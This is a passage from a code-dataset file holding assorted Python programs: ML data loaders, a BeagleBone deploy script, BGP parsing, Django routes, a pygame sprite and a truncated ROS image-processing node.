Loader.\n :param chosen: Specification of chosen expressions.\n :param directory: Path to saved word problems.\n :return: Instance of class Data.\n \"\"\"\n data = Data(directory=directory, loader=loader, chosen=chosen, count=count)\n data.create_expression_labels()\n data.get_result_labels()\n data.set_init_dictionary()\n data.set_possible_expressions_wps(set(data.expressions))\n return data\n\n\ndef create_buckets_new(expressions):\n \"\"\"\n Creates dictionary where KEY is an expression and VALUE is a list of indexes.\n :param expressions: List of string expressions. ['NUM1 + NUM2', 'NUM1 - NUM2', 'NUM1 + NUM2', ...]\n :return: Dictionary described above. 
{'NUM1 + NUM2': [0, 2, ....], 'NUM1 - NUM2': [1, ...]}\n \"\"\"\n buckets = dict()\n for i, expression in enumerate(expressions, start=0):\n if expression in buckets:\n buckets[expression].append(i)\n else:\n buckets[expression] = [i]\n return buckets\n\n\ndef create_expression_labels(expressions):\n \"\"\"\n Creates sorted dictionary where KEY is an expression and VALUE is an unique number from 0 to N - 1 where N is number of unique expressions.\n :param expressions: List of string expressions. ['NUM1 + NUM2', 'NUM1 - NUM2', 'NUM1 + NUM2', ...]\n :return: {'NUM1 + NUM2': 0, 'NUM1 - NUM2': 1, ...}\n \"\"\"\n unique = list(set(expressions))\n unique.sort()\n expression_labels = {val: i for i, val in enumerate(unique, start=0)}\n return expression_labels\n\n\nclass Data:\n expression_labels = None\n labels = None\n\n def __init__(self, directory: str, loader: 'Loader', chosen: List[str] = None, count: int = None) -> None:\n \"\"\"\n Constructor for class Data. Data class wraps all important information about train or test data.\n :param count: Specifying the number of files for word problems.\n :param directory: Parameter specifying path to files.\n :param loader: Instance of class Loader.\n :param chosen: List of chosen word problems. Example: ['NUM1 + NUM2', 'NUM1 - NUM2', ...]\n \"\"\"\n self.directory = directory\n if chosen is None:\n self.word_problems, self.results, self.expressions = get_chosen_word_problems(loader, directory,\n count=count)\n else:\n self.word_problems, self.results, self.expressions = get_chosen_word_problems(loader, directory, chosen,\n count=count)\n self.buckets = create_buckets_new(self.expressions)\n\n def create_expression_labels(self):\n \"\"\"\n Creates sorted dictionary where KEY is an expression and VALUE is an unique number from 0 to N - 1 where N is number of unique expressions.\n \"\"\"\n self.expression_labels = create_expression_labels(self.expressions)\n\n def set_expression_labels(self, labels: Dict):\n \"\"\"\n Sets expressions labels.\n :param labels: Dictionary of labels, where KEY is an expression and VALUE is an unique number from 0 to N - 1 where N is number of unique expressions.\n \"\"\"\n self.expression_labels = labels\n\n def set_init_dictionary(self):\n \"\"\"\n Sets init dictionary to every word problem in self.word_problems.\n \"\"\"\n init = {e: 0 for e in self.expression_labels}\n for word_problem in self.word_problems:\n word_problem.init_dictionary = init\n\n def get_result_labels(self):\n \"\"\"\n Converts expressions to number identifier for SVM.\n \"\"\"\n assert self.expression_labels is not None\n self.labels = [self.expression_labels[expression] for expression in self.expressions]\n\n def set_possible_expressions_wps(self, expressions: Set):\n \"\"\"\n Tries all expressions from train expressions. Creates sets of possible expressions (result is higher or equal to 0)\n :param expressions: Expression set from train data.\n \"\"\"\n for word_problem in self.word_problems:\n word_problem.set_possible_expressions(expressions)\n\n\nclass SolveDataSVM:\n def __init__(self, dataset, loader, train_dir_init='/traindata', test_dir_init='/testdata', chosen_test=None,\n chosen_both=None):\n \"\"\"\n Handles creating two wrappers for train and test data. Applies given logic.\n Dataset can be WP150 or WP500.\n\n :param dataset: WP150 or WP500\n :param loader: Instance of class Loader.\n :param chosen_test: Specifies if we want to run testing on some special expressions. 
Important condition is that expressions must be in train Data.\n :param chosen_both: If chosen_bot is specified it creates two wrappers with different word problems but same expressions.\n \"\"\"\n assert dataset == 'WP150' or dataset == 'WP500'\n train_path = './dataset/' + dataset + train_dir_init\n test_path = './dataset/' + dataset + test_dir_init\n if chosen_both is not None:\n self.train_data = Data(train_path, loader, chosen_both)\n self.test_data = Data(test_path, loader, chosen_both)\n else:\n self.train_data = Data(train_path, loader)\n if chosen_test is None:\n # set chosen to set of expressions from self.train_data\n self.test_data = Data(test_path, loader, chosen=list(set(list(self.train_data.expressions))))\n else:\n # check if set chosen_test - set of expressions from self.train_data is empty set,\n assert set(chosen_test) - set(self.train_data.expressions) == set()\n self.test_data = Data(test_path, loader, chosen=chosen_test)\n self.train_data.create_expression_labels()\n self.test_data.set_expression_labels(self.train_data.expression_labels)\n\n self.train_data.set_init_dictionary()\n self.test_data.set_init_dictionary()\n\n self.train_data.get_result_labels()\n self.test_data.get_result_labels()\n\n self.train_data.set_possible_expressions_wps(set(self.train_data.expressions))\n self.test_data.set_possible_expressions_wps(set(self.train_data.expressions))\n\n\nclass SolveDataSA:\n def __init__(self, directory: str, chosen: List = None):\n \"\"\"\n Prepares data for Syntax Analysis (first solution in Bachelor thesis).\n :param directory: Directory of word problems.\n :param chosen: List of chosen expressions solving word problems.\n \"\"\"\n sentences, results, data, expressions = load.get_files_for_sa(directory)\n if chosen is None:\n self.sentences, self.results, self.data, self.expressions = sentences, results, data, expressions\n else:\n mask = expressions == chosen[0]\n for c in chosen[1:]:\n mask = np.logical_or(mask, expressions == c)\n self.sentences, self.results, self.data, self.expressions = sentences[mask], results[mask], data[mask], expressions[mask]\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":7566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264408249","text":"import os, sys\r\nimport subprocess \r\nimport time\r\n\r\n#Possible paths for SSH and SCP - assume we're using the ones from the GIT install,\r\n# but don't assume people put them on their paths. 
Chris Gerth forces the C/B/D drive\r\n# checking because he builds giant computers and installs things wherever he likes.\r\nSSH_PATH_LIST = [\"C:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"B:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"D:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"B:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"D:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"C:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"B:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"D:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\ssh.exe\",\r\n \"C:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"B:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n \"D:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\ssh.exe\",\r\n\t\t\t\t \"C:\\\\Program Files (x86)\\\\Git\\\\bin\\\\ssh.exe\",\r\n \"ssh\"]\r\n \r\n \r\n \r\n \r\nSCP_PATH_LIST = [\"C:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"B:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"D:\\\\Program Files\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"B:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"D:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"C:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"B:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"D:\\\\Program Files (x86)\\\\Git\\\\mingw32\\\\bin\\\\scp.exe\",\r\n \"C:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"B:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n \"D:\\\\Program Files (x86)\\\\Git\\\\usr\\\\bin\\\\scp.exe\",\r\n\t\t\t\t \"C:\\\\Program Files (x86)\\\\Git\\\\bin\\\\scp.exe\",\r\n \"scp\"]\r\n \r\n#Beaglebone Black should be at a fixed IP address\r\nTARGET_IP_ADDRESS = \"10.17.36.9\"\r\n \r\n#Path to root directory where we put the files on the remote\r\nTARGET_SCRIPT_DIR = \"~/CasseroleVision/\"\r\nTARGET_SERVICE_DIR = \"/lib/systemd/system/\"\r\nTARGET_SERVICE_DIR_TOM = \"/home/root/CasseroleVision/\"\r\n\r\n\r\n#Utility to determine if path is an executable \r\ndef isExecutable(fpath):\r\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\r\n \r\n#Runs command with error checking and prints info\r\ndef runCmd(cmd, ignore_error=False, cmd_stdin = None):\r\n errors_present = False\r\n retstr = \"\"\r\n print(\"\\n\\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\r\n print(\"Running command:\\n\" + cmd)\r\n\r\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,stdin=subprocess.PIPE)\r\n if(cmd_stdin != None):\r\n proc.stdin.write(cmd_stdin.encode())\r\n retstr = proc.communicate()[0]\r\n retstr = retstr.decode('utf-8')\r\n\r\n if((errors_present or proc.returncode != 0) and ignore_error == False):\r\n print(\"Error while running command:\\n\" + retstr)\r\n print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\\n\\n\")\r\n sys.exit(-1)\r\n \r\n print(\"Command returned:\\n\" + retstr)\r\n print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\\n\\n\")\r\n return retstr\r\n \r\n \r\n##################################################################\r\n### Main code begins here\r\n##################################################################\r\n\r\n#Find where SSH and SCP are at on the 
user's PC\r\nssh_exe = None\r\nscp_exe = None\r\nfor path in SSH_PATH_LIST:\r\n if(isExecutable(path)):\r\n ssh_exe = \"\\\"\" + path + \"\\\"\" \r\n break\r\n \r\nif(ssh_exe == None):\r\n print(\"ERROR: cannot find SSH utility on this PC.... is Git installed?\")\r\n sys.exit(-1)\r\n \r\n \r\nfor path in SCP_PATH_LIST:\r\n if(isExecutable(path)):\r\n scp_exe = \"\\\"\" + path + \"\\\"\" \r\n break\r\n \r\nif(scp_exe == None):\r\n print(\"ERROR: cannot find SSH utility on this PC.... is Git installed?\")\r\n sys.exit(-1)\r\n\r\n#Copy python scripts\r\ncmd = scp_exe + \" ../*.py\" + \" root@\" + TARGET_IP_ADDRESS + \":\"+ TARGET_SCRIPT_DIR \r\nprint(\"Copying python scripts...\")\r\nrunCmd(cmd, False, \"\\n\")\r\n\r\n\r\nsys.exit(0)\r\n\r\n \r\n","sub_path":"RobotCasserole2017-master/BBB/deploy/justCopyCode.py","file_name":"justCopyCode.py","file_ext":"py","file_size_in_byte":4536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"124667158","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import KFold\n\nfrom utils import print_step\n\n\ndef run_cv_model(train, test, target, model_fn, params, eval_fn, label):\n kf = KFold(n_splits=5, shuffle=True, random_state=2017)\n fold_splits = kf.split(train)\n cv_scores = []\n pred_full_test = 0\n pred_train = np.zeros(train.shape[0])\n i = 1\n for dev_index, val_index in fold_splits:\n print_step('Started ' + label + ' fold ' + str(i) + '/5')\n if isinstance(train, pd.DataFrame):\n dev_X, val_X = train.values[dev_index], train.values[val_index]\n dev_y, val_y = target[dev_index], target[val_index]\n dev_X = pd.DataFrame(dev_X, columns=train.columns)\n val_X = pd.DataFrame(val_X, columns=train.columns)\n for (column, dtype) in list(zip(train.columns, list(train.dtypes))):\n dev_X[column] = dev_X[column].astype(dtype)\n val_X[column] = val_X[column].astype(dtype)\n else:\n dev_X, val_X = train[dev_index], train[val_index]\n dev_y, val_y = target[dev_index], target[val_index]\n\n params2 = params.copy()\n pred_val_y, pred_test_y = model_fn(dev_X, dev_y, val_X, val_y, test, params2)\n pred_full_test = pred_full_test + pred_test_y\n pred_train[val_index] = pred_val_y\n cv_score = eval_fn(val_y, pred_val_y)\n cv_scores.append(eval_fn(val_y, pred_val_y))\n print_step(label + ' cv score ' + str(i) + ' : ' + str(cv_score))\n i += 1\n print_step(label + ' cv scores : ' + str(cv_scores))\n print_step(label + ' mean cv score : ' + str(np.mean(cv_scores)))\n print_step(label + ' std cv score : ' + str(np.std(cv_scores)))\n pred_full_test = pred_full_test / 5.0\n results = {'label': label,\n 'train': pred_train, 'test': pred_full_test,\n 'cv': cv_scores}\n return results\n","sub_path":"cv.py","file_name":"cv.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"272373791","text":"#!/usr/bin/env python3\nfrom _pybgpstream import BGPStream, BGPRecord, BGPElem\nimport sqlite3\nimport iptools\n\ndef calculate_min_max(ip):\n ip_range = iptools.IpRange(ip)\n return inflate_ip(ip_range[0]), inflate_ip(ip_range[-1])\n\ndef inflate_ip(ip):\n if iptools.ipv4.validate_ip(ip):\n return inflate_ipv4(ip)\n return inflate_ipv6(ip)\n\ndef inflate_ipv4(ip):\n ip = ip.split(\".\")\n ip = \".\".join([str(i).zfill(3) for i in ip])\n return ip\n\ndef inflate_ipv6(ip):\n ip = ip.split(\":\")\n ip_len = len(ip)\n for _ in range(ip_len, 8):\n ip.append(0)\n ip = \":\".join([str(i).zfill(4) for i in ip])\n 
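# Zero-padding every group means plain string comparison of the stored addresses matches numeric IPv6 order.\n    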
return ip\n\ndef prepare_sql_database():\n    conn = sqlite3.connect('bgp_stage.db')\n    c = conn.cursor()\n    c.execute('''CREATE TABLE IF NOT EXISTS as_link\n                 (as_o INTEGER, as_n INTEGER, count INTEGER, last_update INTEGER)''')\n\n    c.execute('''CREATE TABLE IF NOT EXISTS prefix_as\n                 (ip_min TEXT, ip_max TEXT, as_o INTEGER, count INTEGER, last_update INTEGER)''')\n    conn.commit()\n    conn.close()\n\ndef build_sql_db():\n    conn = sqlite3.connect('bgp_stage.db')\n    c = conn.cursor()\n\n    # Create a new bgpstream instance and a reusable bgprecord instance\n    stream = BGPStream()\n    rec = BGPRecord()\n\n    stream.add_filter('collector','rrc11')\n    stream.add_interval_filter(1438417216,1438417316)\n    stream.start()\n\n    while(stream.get_next_record(rec)):\n        if rec.status != \"valid\":\n            continue\n        else:\n            elem = rec.get_next_elem()\n            while(elem):\n                if elem.type == \"AB\":\n                    prefix = elem.fields[\"prefix\"]\n                    as_path = elem.fields[\"as-path\"].split(\" \")\n                    origin = as_path[-1]\n                    time = elem.time\n\n\n                    #IP Prefix database\n                    ip_min, ip_max = calculate_min_max(prefix)\n                    c.execute(\"SELECT ip_min FROM prefix_as WHERE ip_min = (?) AND ip_max = (?) AND as_o = (?)\", (ip_min, ip_max, origin))\n                    row = c.fetchone()\n                    if row is not None:\n                        c.execute(\"UPDATE prefix_as SET count = count + 1 WHERE ip_min = (?) AND ip_max = (?) AND as_o = (?)\", (ip_min, ip_max, origin))\n                    else:\n                        c.execute(\"INSERT INTO prefix_as VALUES(?,?,?,?,?)\", (ip_min, ip_max, origin, 1, time))\n\n\n                    #AS link database\n                    for as1,as2 in zip(as_path, as_path[1:]) :\n                        c.execute(\"SELECT as_o FROM as_link WHERE as_o = (?) AND as_n = (?)\",(as1,as2))\n                        row = c.fetchone()\n                        if row is not None:\n                            c.execute(\"UPDATE as_link SET count = count + 1 WHERE as_o = (?) AND as_n = (?)\",\n                                      (as1, as2))\n                        else:\n                            c.execute(\"INSERT INTO as_link VALUES(?,?,?,?)\", (as1, as2, 1, 0))\n\n                elif elem.type == \"WA\":\n                    prefix = elem.fields[\"prefix\"]\n                    time = elem.time\n                    #Needs research\n\n                    print(rec.project, rec.collector, rec.type, rec.time, rec.status,\n                          elem.type, elem.peer_address, elem.peer_asn, elem.fields)\n                    print(prefix,elem.time, \"W\")\n\n                print(rec.project, rec.collector, rec.type, rec.time, rec.status,\n                      elem.type, elem.peer_address, elem.peer_asn, elem.fields)\n                elem = rec.get_next_elem()\n    conn.commit()\n    conn.close()\n\n\ndef test_sql():\n    conn = sqlite3.connect('bgp_stage.db')\n    c = conn.cursor()\n    c.execute(\"SELECT * FROM as_link WHERE as_o = 901022\")\n    cursor = c.fetchall()\n    if len(cursor) == 0:\n        print(\"LOL\")\n    for entry in cursor:\n        for e in entry:\n            print(e,end=\" \")\n        print(\"\")\n    c.execute(\"UPDATE as_link SET count = count + 1, last_update = (?) WHERE as_o = (?) AND as_n = (?)\", (6666, 9008, 9009))\n    c.execute(\"INSERT INTO as_link VALUES(?,?,?,?)\", (90022, 9009, 1, 12345))\n    conn.commit()\n    conn.close()\n\n\nif __name__ == '__main__':\n    prepare_sql_database()\n    build_sql_db()\n    test_sql()\n    ip_min, ip_max = calculate_min_max(\"2001:db8::/32\")\n    print(\"[!] 
Min IP:\", ip_min, \"Max IP:\", ip_max)","sub_path":"bgpBuilder.py","file_name":"bgpBuilder.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"16659820","text":"\"\"\"\n Copyright 2018 EPAM Systems, Inc.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nimport os\nimport shutil\n\nfrom syndicate.commons.log_helper import get_logger\nfrom syndicate.core import CONFIG\nfrom syndicate.core.constants import ARTIFACTS_FOLDER\nfrom syndicate.core.helper import build_path, execute_command_by_path\n\n_LOG = get_logger('java_runtime_assembler')\n\n\ndef assemble_java_mvn_lambdas(bundle_name, project_path):\n src_path = build_path(CONFIG.project_path, project_path)\n _LOG.info(\n 'Going to process java mvn project by path: {0}'.format(src_path))\n target_folder = build_path(CONFIG.project_path,\n ARTIFACTS_FOLDER,\n bundle_name)\n if not os.path.exists(target_folder):\n os.makedirs(target_folder)\n\n _LOG.debug('Target directory: {0}'.format(target_folder))\n execute_command_by_path(command='mvn clean install', path=src_path)\n\n # copy java artifacts to the target folder\n for root, dirs, files in os.walk(src_path):\n for file in files:\n if file.endswith(\".jar\") or file.endswith(\".war\") \\\n or file.endswith(\".zip\"):\n shutil.copyfile(build_path(root, file),\n build_path(target_folder, file))\n\n _LOG.info('Java mvn project was processed successfully')\n","sub_path":"syndicate/core/build/runtime/java.py","file_name":"java.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61713851","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'cars.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', 'cars.views.index', name='index'),\n url(r'^car/delete/(?P[0-9]+)/$', 'cars.views.delete_car', name='delete_car'),\n url(r'^car/edit/(?P[0-9]+)/$', 'cars.views.edit_car', name='edit_car'),\n url(r'^filter/(?P[\\w-]+)/$', 'cars.views.filter_color', name='filter_color'),\n url(r'^get_colors/$', 'cars.views.get_colors', name='get_colors'),\n url(r'^reorder/$', 'cars.views.reorder', name='reorder'),\n \n url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"cars/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62494847","text":"\"\"\"\nGiven an integer n, return 1 - n in lexicographical order.\n\nFor example, given 13, return: [1,10,11,12,13,2,3,4,5,6,7,8,9].\n\nPlease optimize your algorithm to use less time and space. 
The input size may be as large as 5,000,000.\n\"\"\"\nclass Solution:\n def lexicalOrder(self, n):\n \"\"\"\n :type n: int\n :rtype: List[int]\n \"\"\"\n i, count = 1, 0\n res = [0] * n\n while count < n:\n res[count] = i\n if i * 10 <= n:\n i = i * 10\n else:\n i += 1\n if i > n:\n if i % 10 == 0:\n i = i // 10\n else:\n i = i//10 + 1\n while i % 10 == 0:\n i //= 10\n count += 1\n return res\n\ns = Solution()\nprint(s.lexicalOrder(13))\n","sub_path":"leetcode/lexicographicalNumbers/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"43865463","text":"def inner_rk(run_time, state, f_max, dt, rko):\n n_steps = int(run_time // dt)\n print('RK{}: {} seconds in {} steps'.format(rko, run_time, n_steps))\n if rko == 4:\n kc = np.array([0., 1./2. * dt, 1./2. * dt, dt], dtype=dtype)\n update = '{post} + dt * (k1 + 2*k2 + 2*k3 + k4)'\n else:\n kc = np.array([0., 2./3. * dt], dtype=dtype)\n update = '{post} + dt * (k1 + 3*k2)'\n\n results = {pn: np.empty((r.size, n_steps), dtype=dtype) for pn, r in state['rate'].items()}\n dy = {post: ('tau_inv*(' + ('in_{post} + ' if post in state['input'] else '')\n + ' + '.join('h_'+pre for pre in all_pre.keys())+' - {post})').format(post=post)\n for post, all_pre in state['conn'].items()}\n hd = {post: {pre: np.zeros_like(state['rate'][post]) for pre in all_pre}\n for post, all_pre in state['conn'].items()}\n rates = state['rate']\n\n def make_partial(c, post, pre):\n if isinstance(c, csr_matrix):\n return partial(csr_matvec, c.shape[0], c.shape[1], c.indptr, c.indices, c.data, rates[pre], hd[post][pre])\n else:\n return partial(np.dot, c, rates[pre], hd[post][pre])\n dots = {post: {pre: make_partial(conn, post, pre) for pre, conn in iteritems(all_pre)}\n for post, all_pre in iteritems(state['conn'])}\n ud = {}\n for post, pd in iteritems(hd):\n ud[post] = {'h_'+pre: h for pre, h in iteritems(pd)}\n ud[post]['dt'] = dtype(dt/6.) if rko == 4 else dtype(dt/4.)\n ud[post][post] = state['rate'][post]\n ud[post]['tau_inv'] = dtype(1 / 10e-3)\n ka = np.zeros((rko + 1, state['rate'][post].size), dtype=dtype)\n ud[post]['k'] = ka\n ud[post].update({'k{}'.format(i): ka[i, :] for i in range(ka.shape[0])})\n if post in state['input']:\n ud[post]['in_'+post] = state['input'][post]\n for n in range(n_steps):\n for k in range(1, rko+1):\n def get_r(pn):\n return rates[pn] + kc[k - 1] * ud[pn]['k'][k - 1, :]\n [h.fill(0.) 
for post, all_pre in iteritems(hd) for h in all_pre.values()]\n [dot() for post, all_pre in iteritems(dots) for dot in all_pre.values()]\n for post, rule in iteritems(dy):\n ld = dict(ud[post])\n ld[post] = get_r(post)\n ne.evaluate(rule, local_dict=ld, out=ud[post]['k'][k, :])\n for post, rule in iteritems(dy):\n ne.evaluate(update.format(post=post), local_dict=ud[post], out=rates[post])\n np.clip(rates[post], 0.0, f_max, rates[post])\n results[post][:, n] = rates[post]\n\n return results\n\n\n\n\ndef make_state():\n from snep.library.rates.utils import compute_connections, dtype\n from scipy.sparse import csr_matrix\n check_sanity = 0\n single_array = 1\n if check_sanity:\n n_pc = n_pv = n_som = n_vip = 5\n else:\n n_pc = 317\n n_pv = 15\n n_som = 12\n n_vip = 16\n pops = ['pc', 'pv', 'som', 'vip']\n pop_n = {'pc': n_pc, 'pv': n_pv, 'som': n_som, 'vip': n_vip}\n r_pc = np.zeros(n_pc, dtype=dtype)\n r_pv = np.zeros(n_pv, dtype=dtype)\n r_som = np.zeros(n_som, dtype=dtype)\n r_vip = np.zeros(n_vip, dtype=dtype)\n conn_d = dict(sparse=False, scale=np.infty, f_global=0., d_pre=1., d_post=1., scalar_data=False, fixed_in=True,\n j_scale=False)\n state = {'pops': pops,\n 'n': pop_n,\n 'rate': {'pc': r_pc,\n 'pv': r_pv,\n 'som': r_som,\n 'vip': r_vip},\n 'input': {'pc': 10*np.ones_like(r_pc),\n # 'pv': np.zeros_like(r_pv),\n # 'som': np.zeros_like(r_som),\n 'vip': 1.2*np.ones_like(r_vip)},\n 'conn': {'pc': {'pc': dict(conn_d, p=.1, J=.5),\n 'pv': dict(conn_d, p=.6, J=-1.),\n # 'som': dict(conn_d, p=.55, J=-1.)\n },\n 'pv': {'pc': dict(conn_d, p=.45, J=1.),\n 'pv': dict(conn_d, p=.5, J=-1.),\n 'som': dict(conn_d, p=.6, J=-1.)},\n 'som': {'pc': dict(conn_d, p=.35, J=.9),\n 'vip': dict(conn_d, p=.5, J=-1.)},\n 'vip': {'pc': dict(conn_d, p=.1, J=.8),\n # 'pv': dict(conn_d, p=.1, J=0.),\n 'som': dict(conn_d, p=.45, J=-1.)}\n }\n }\n for post, all_pre in iteritems(state['conn']):\n for pre in all_pre:\n cd = all_pre[pre]\n if check_sanity:\n cd['p'] = 1.\n cd['zero_diagonal'] = pre == post\n cd['N_pre'] = state['n'][pre]\n cd['N_post'] = state['n'][post]\n cd['J'] /= cd['p'] * (state['n'][pre] - 1 if pre == post else state['n'][pre])\n all_pre[pre] = compute_connections(**cd)[0]\n if single_array:\n p_i = {pn: i for i, pn in enumerate(pops)}\n ns = np.array([0] + [state['n'][pn] for pn in pops])\n n = ns.sum()\n idx = np.cumsum(ns)\n c = np.zeros((n, n), dtype=dtype)\n for post in state['conn']:\n i = p_i[post]\n for pre in state['conn'][post]:\n j = p_i[pre]\n cpp = state['conn'][post][pre]\n c[idx[i]:idx[i+1], idx[j]:idx[j+1]] = cpp\n c = csr_matrix(c)\n r_in = np.zeros(n, dtype=dtype)\n for pn in state['input']:\n i = p_i[pn]\n r_in[idx[i]: idx[i+1]] = state['input'][pn]\n state['pops'] = ['all']\n state['n'] = {'all': n}\n state['conn'] = {'all': {'all': c}}\n state['input'] = {'all': r_in}\n state['rate'] = {'all': np.zeros(n, dtype=dtype)}\n state['sub'] = {'all': idx}\n state['spn'] = {'all': pops}\n else:\n state['sub'] = {pn: np.array([0, n]) for pn, n in iteritems(state['n'])}\n state['spn'] = {pn: [pn] for pn, n in iteritems(state['n'])}\n return state\n\n\nst = make_state()\nans = inner_rk(10., st, 10., 0.1, 2)\n","sub_path":"debugging/advanced_debug_problem.py","file_name":"advanced_debug_problem.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"218833304","text":"import pygame\n\nclass Ship():\n\n\tdef __init__(self,ai_settings, screen):\n\t\t\"\"\"Init the ship and set its starting 
pos\"\"\"\n\t\tself.screen=screen\n\t\tself.ai_settings = ai_settings\n\t\t\n\t\t#load the ship image and get its rect.\n\t\tself.image = pygame.image.load('hat.bmp')\n\t\tself.rect = self.image.get_rect()\n\t\tself.screen_rect = screen.get_rect()\n\t\t\n\t\t#start each new ship at bottom of the screen\n\t\tself.rect.centerx = self.screen_rect.centerx\n\t\tself.rect.bottom = self.screen_rect.bottom\n\t\t\n\t\t#store a dec value for ship's center\n\t\tself.center = float(self.rect.centerx)\n\t\t\n\t\t#movement flag\n\t\tself.moving_right = False\n\t\tself.moving_left = False\n\t\t\n\tdef update(self):\n\t\t\"\"\"update the ship's pos based on movement flag\"\"\"\n\t\tif self.moving_right and self.rect.right < self.screen_rect.right:\n\t\t\tself.center += self.ai_settings.ship_speed_factor\n\t\tif self.moving_left and self.rect.left > 0:\n\t\t\tself.center -= self.ai_settings.ship_speed_factor\n\t\t\t\n\t\t#update rect object from self.center\n\t\tself.rect.centerx = self.center\t\n\t\t\n\tdef blitme(self):\n\t\t\t\"\"\"draw the ship at current loc\"\"\"\n\t\t\tself.screen.blit(self.image,self.rect)\n","sub_path":"testgame/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351519914","text":"#!/usr/bin/env python3\nimport math\n\na, b, x = list(map(int, input().split()))\n\nif 2*x >= a*a*b:\n tan_theta = 2*(b*a*a-x)/(a*a*a)\nelse:\n tan_theta = a*b*b/(2*x)\n\nprint(math.atan(tan_theta)/math.pi*180)\n","sub_path":"abc144/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"489997087","text":"def missingPos():\n arr=list(eval(input()))\n arr.sort()\n for i in range(arr[0], arr[-1]+1):\n if not i in arr:\n print(i)\n break\n if i==0:\n print(arr)\n \nif __name__=='__main__':\n missingPos()\n ","sub_path":"Code/CodeRecords/2538/60617/271058.py","file_name":"271058.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"299502933","text":"#!/usr/bin/env python\n\n\nimport rospy\nfrom cv_bridge import CvBridge\nfrom cv_bridge import CvBridgeError\nfrom sensor_msgs.msg import Image\nimport cv2\nimport rospkg\nfrom threading import Thread\nimport time\nimport numpy as np\nfrom skimage import morphology\nfrom skimage import color\nimport imutils\nfrom pyefd import elliptic_fourier_descriptors\nimport matplotlib.pyplot as plt\nfrom EFD_Calculator import EFD_Calculator\nfrom std_msgs.msg import Float32MultiArray as FloatArray\nfrom geometry_msgs.msg import Pose\nimport scipy as sp\nfrom scipy import signal\n\n \nclass image_processor:\n\n def __init__(self):\n rospy.init_node('image_processor', anonymous=True)\n 